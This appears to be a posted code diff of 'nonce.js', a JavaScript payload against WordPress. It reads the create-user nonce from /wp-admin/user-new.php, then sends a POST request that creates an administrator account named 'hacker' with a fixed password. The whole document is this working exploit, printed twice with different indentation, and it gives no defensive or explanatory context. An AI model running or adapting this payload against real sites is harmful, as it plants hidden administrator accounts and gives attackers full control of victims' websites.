c0d3x27 · January 13, 2025 23:57
diff --git a/nonce.js b/nonce.js
 // Step 1: Extract nonce via GET request
 let ajaxRequest = new XMLHttpRequest();
 const requestURL = "/wp-admin/user-new.php";
 const nonceRegex = /ser" value="([^"]*?)"/g;

 ajaxRequest.open("GET", requestURL, false); // Synchronous GET request
 ajaxRequest.send();

 const nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
 const nonce = nonceMatch[1];

 // Step 2: Use nonce to send POST request
 const params = "action=createuser&_wpnonce_create-user=" + nonce +
               "&user_login=hacker&[email protected]" +
               "&pass1=hackerpass&pass2=hackerpass&role=administrator";

 ajaxRequest = new XMLHttpRequest();
 ajaxRequest.open("POST", requestURL, true); // Asynchronous POST request
 ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 ajaxRequest.send(params);
	// Step 1: Extract nonce via GET request
	let ajaxRequest = new XMLHttpRequest();
	const requestURL = "/wp-admin/user-new.php";
	const nonceRegex = /ser" value="([^"]*?)"/g;

	ajaxRequest.open("GET", requestURL, false); // Synchronous GET request
	ajaxRequest.send();

	const nonceMatch = nonceRegex.exec(ajaxRequest.responseText);
	const nonce = nonceMatch[1];

	// Step 2: Use nonce to send POST request
	const params = "action=createuser&_wpnonce_create-user=" + nonce +
	"&user_login=hacker&[email protected]" +
	"&pass1=hackerpass&pass2=hackerpass&role=administrator";

	ajaxRequest = new XMLHttpRequest();
	ajaxRequest.open("POST", requestURL, true); // Asynchronous POST request
	ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	ajaxRequest.send(params);